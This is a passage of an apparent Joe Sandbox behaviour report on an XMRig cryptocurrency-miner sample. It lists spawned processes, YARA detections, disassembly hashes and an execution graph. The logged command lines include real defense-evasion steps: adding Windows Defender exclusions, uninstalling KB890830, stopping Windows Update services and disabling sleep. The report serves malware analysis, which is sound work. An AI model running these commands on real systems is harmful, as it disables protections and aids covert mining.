                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:33
                                                                              Start time:16:46:05
                                                                              Start date:06/12/2024
                                                                              Path:C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe
                                                                              Imagebase:0x7ff62c3e0000
                                                                              File size:7'198'720 bytes
                                                                              MD5 hash:6369AD2A31D25FA131268F312B0C9D03
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 74%, ReversingLabs
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:34
                                                                              Start time:16:46:05
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:35
                                                                              Start time:16:46:05
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:36
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff7d0220000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:37
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:38
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:39
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:40
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6be590000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:41
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:42
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:43
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:44
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:45
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop bits
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:46
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:47
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:48
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:49
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff707360000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:50
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff707360000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:51
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:52
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff707360000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:53
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:54
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff707360000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:55
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:56
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:57
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:58
                                                                              Start time:16:46:08
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:explorer.exe
                                                                              Imagebase:0x7ff72b770000
                                                                              File size:5'141'208 bytes
                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1824324601.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1786548179.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1824408272.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.3137522381.000000000060B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000002.4158665690.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1823929141.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000002.4158665690.0000000000585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1824391843.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1824376543.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000002.4158665690.00000000005E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1823776260.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.2965773416.000000000060B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.2747475402.000000000060B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.2860263171.000000000060B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1824439592.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000002.4158665690.0000000000549000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003A.00000003.1823817242.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Function 00007FF707F11140 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1749382292.00007FF707F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF707F10000, based on PE: true
                                                                                • Associated: 00000000.00000002.1749361276.00007FF707F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1749463998.00007FF707F1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1749483276.00007FF707F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1749584297.00007FF707F1F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1750504454.00007FF7085DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1750535090.00007FF7085E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1750587013.00007FF7085E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff707f10000_nlGOh9K5X5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                                                • Instruction ID: 0c4dc7e33fed2155a682171811a2f3fdf7a939539583b3ba1c5502b5327429fd
                                                                                • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                                                • Instruction Fuzzy Hash: 4EB0926090420D84E2007B019C41268A6606F08740F810020C50C12352CBAD60438B20

                                                                                Executed Functions

                                                                                Function 00007FF62C3E1140 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000021.00000002.1786905607.00007FF62C3E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62C3E0000, based on PE: true
                                                                                • Associated: 00000021.00000002.1786872945.00007FF62C3E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000021.00000002.1786937336.00007FF62C3EB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000021.00000002.1786966118.00007FF62C3EE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000021.00000002.1788340792.00007FF62CAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000021.00000002.1788388510.00007FF62CAB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_33_2_7ff62c3e0000_mfpmikspvfzi.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                                                • Instruction ID: c849138409d4646d7a9fecfd9c74388d8a1e077a4e1a024ffaa85bb1318c7b85
                                                                                • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                                                • Instruction Fuzzy Hash: 31B0922091420E84EA052B019C816A832A06F08750F400820C40C42353CE6D68404B56

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:10.7%
                                                                                Total number of Nodes:826
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 2825 140001ac3 2828 140001a70 2825->2828 2826 14000199e 2830 140001a0f 2826->2830 2832 1400019e9 VirtualProtect 2826->2832 2827 140001b36 2829 140001ba0 4 API calls 2827->2829 2828->2826 2828->2827 2831 140001b53 2828->2831 2829->2831 2832->2826 1997 140001ae4 1998 140001a70 1997->1998 1999 14000199e 1998->1999 2000 140001b36 1998->2000 2003 140001b53 1998->2003 2002 140001a0f 1999->2002 2004 1400019e9 VirtualProtect 1999->2004 2005 140001ba0 2000->2005 2004->1999 2008 140001bc2 2005->2008 2006 140001c04 memcpy 2006->2003 2008->2006 2009 140001c45 VirtualQuery 2008->2009 2010 140001cf4 2008->2010 2009->2010 2014 140001c72 2009->2014 2011 140001d23 GetLastError 2010->2011 2012 140001d37 2011->2012 2013 140001ca4 VirtualProtect 2013->2006 2013->2011 2014->2006 2014->2013 2033 140001404 2106 140001394 2033->2106 2035 140001413 2036 140001394 2 API calls 2035->2036 2037 140001422 2036->2037 2038 140001394 2 API calls 2037->2038 2039 140001431 2038->2039 2040 140001394 2 API calls 2039->2040 2041 140001440 2040->2041 2042 140001394 2 API calls 2041->2042 2043 14000144f 2042->2043 2044 140001394 2 API calls 2043->2044 2045 14000145e 2044->2045 2046 140001394 2 API calls 2045->2046 2047 14000146d 2046->2047 2048 140001394 2 API calls 2047->2048 2049 14000147c 2048->2049 2050 140001394 2 API calls 2049->2050 2051 14000148b 2050->2051 2052 140001394 2 API calls 2051->2052 2053 14000149a 2052->2053 2054 140001394 2 API calls 2053->2054 2055 1400014a9 2054->2055 2056 140001394 2 API calls 2055->2056 2057 1400014b8 2056->2057 2058 140001394 2 API calls 2057->2058 2059 1400014c7 2058->2059 2060 140001394 2 API calls 2059->2060 2061 1400014d6 2060->2061 2062 1400014e5 2061->2062 2063 140001394 2 API calls 2061->2063 2064 140001394 2 API calls 2062->2064 2063->2062 2065 1400014ef 2064->2065 2066 1400014f4 2065->2066 2067 140001394 2 API calls 2065->2067 2068 140001394 2 API calls 2066->2068 2067->2066 2069 1400014fe 2068->2069 2070 140001503 2069->2070 2071 140001394 2 API calls 2069->2071 2072 140001394 2 API calls 2070->2072 2071->2070 2073 14000150d 2072->2073 2074 140001394 2 API calls 2073->2074 2075 140001512 2074->2075 2076 140001394 2 API calls 2075->2076 2077 140001521 2076->2077 2078 140001394 2 API calls 2077->2078 2079 140001530 2078->2079 2080 140001394 2 API calls 2079->2080 2081 14000153f 2080->2081 2082 140001394 2 API calls 2081->2082 2083 14000154e 2082->2083 2084 140001394 2 API calls 2083->2084 2085 14000155d 2084->2085 2086 140001394 2 API calls 2085->2086 2087 14000156c 2086->2087 2088 140001394 2 API calls 2087->2088 2089 14000157b 2088->2089 2090 140001394 2 API calls 2089->2090 2091 14000158a 2090->2091 2092 140001394 2 API calls 2091->2092 2093 140001599 2092->2093 2094 140001394 2 API calls 2093->2094 2095 1400015a8 2094->2095 2096 140001394 2 API calls 2095->2096 2097 1400015b7 2096->2097 2098 140001394 2 API calls 2097->2098 2099 1400015c6 2098->2099 2100 140001394 2 API calls 2099->2100 2101 1400015d5 2100->2101 2102 140001394 2 API calls 2101->2102 2103 1400015e4 2102->2103 2104 140001394 2 API calls 2103->2104 2105 1400015f3 2104->2105 2107 140005a70 malloc 2106->2107 2108 1400013b8 2107->2108 2109 1400013c6 NtQueryAttributesFile 2108->2109 2109->2035 2110 140002104 2111 140002111 EnterCriticalSection 2110->2111 2112 140002218 2110->2112 2113 14000220b LeaveCriticalSection 2111->2113 2114 14000212e 2111->2114 2115 140002272 2112->2115 2117 140002241 DeleteCriticalSection 2112->2117 2113->2112 2114->2113 2116 14000214d TlsGetValue GetLastError 2114->2116 2116->2114 2117->2115 2015 14000216f 2016 140002185 2015->2016 2017 140002178 InitializeCriticalSection 2015->2017 2017->2016 2018 140001a70 2019 14000199e 2018->2019 2023 140001a7d 2018->2023 2020 140001a0f 2019->2020 2021 1400019e9 VirtualProtect 2019->2021 2021->2019 2022 140001b53 2023->2018 2023->2022 2024 140001b36 2023->2024 2025 140001ba0 4 API calls 2024->2025 2025->2022 2833 140002050 2834 14000205e EnterCriticalSection 2833->2834 2835 1400020cf 2833->2835 2836 1400020c2 LeaveCriticalSection 2834->2836 2837 140002079 2834->2837 2836->2835 2837->2836 2838 140001fd0 2839 140001fe4 2838->2839 2840 140002033 2838->2840 2839->2840 2841 140001ffd EnterCriticalSection LeaveCriticalSection 2839->2841 2841->2840 2126 140001ab3 2127 140001a70 2126->2127 2127->2126 2128 14000199e 2127->2128 2129 140001b36 2127->2129 2132 140001b53 2127->2132 2131 140001a0f 2128->2131 2133 1400019e9 VirtualProtect 2128->2133 2130 140001ba0 4 API calls 2129->2130 2130->2132 2133->2128 1987 140001394 1991 140005a70 1987->1991 1989 1400013b8 1990 1400013c6 NtQueryAttributesFile 1989->1990 1992 140005a8e 1991->1992 1995 140005abb 1991->1995 1992->1989 1993 140005b63 1994 140005b7f malloc 1993->1994 1996 140005ba0 1994->1996 1995->1992 1995->1993 1996->1992 2118 14000219e 2119 140002272 2118->2119 2120 1400021ab EnterCriticalSection 2118->2120 2121 140002265 LeaveCriticalSection 2120->2121 2123 1400021c8 2120->2123 2121->2119 2122 1400021e9 TlsGetValue GetLastError 2122->2123 2123->2121 2123->2122 2026 140001800 2027 140001812 2026->2027 2028 140001835 fprintf 2027->2028 2029 140001000 2030 14000108b __set_app_type 2029->2030 2032 140001040 2029->2032 2031 1400010b6 2030->2031 2032->2030 2124 140002320 strlen 2125 140002337 2124->2125 2134 140001140 2137 140001160 2134->2137 2136 140001156 2138 1400011b9 2137->2138 2139 14000118b 2137->2139 2140 1400011d3 2138->2140 2141 1400011c7 _amsg_exit 2138->2141 2139->2138 2142 1400011a0 Sleep 2139->2142 2143 140001201 _initterm 2140->2143 2144 14000121a 2140->2144 2141->2140 2142->2138 2142->2139 2143->2144 2160 140001880 2144->2160 2147 14000126a 2148 14000126f malloc 2147->2148 2149 14000128b 2148->2149 2151 1400012d0 2148->2151 2150 1400012a0 strlen malloc memcpy 2149->2150 2150->2150 2150->2151 2171 140003150 2151->2171 2153 140001315 2154 140001344 2153->2154 2155 140001324 2153->2155 2158 140001160 50 API calls 2154->2158 2156 140001338 2155->2156 2157 14000132d _cexit 2155->2157 2156->2136 2157->2156 2159 140001366 2158->2159 2159->2136 2161 140001247 SetUnhandledExceptionFilter 2160->2161 2162 1400018a2 2160->2162 2161->2147 2162->2161 2163 14000194d 2162->2163 2167 140001a20 2162->2167 2164 14000199e 2163->2164 2165 140001ba0 4 API calls 2163->2165 2164->2161 2166 1400019e9 VirtualProtect 2164->2166 2165->2163 2166->2164 2167->2164 2168 140001b53 2167->2168 2169 140001b36 2167->2169 2170 140001ba0 4 API calls 2169->2170 2170->2168 2173 140003166 2171->2173 2172 1400032a4 wcslen 2245 14000153f 2172->2245 2173->2172 2176 14000349e 2176->2153 2182 14000339f 2183 140003447 wcslen 2182->2183 2184 14000345d 2183->2184 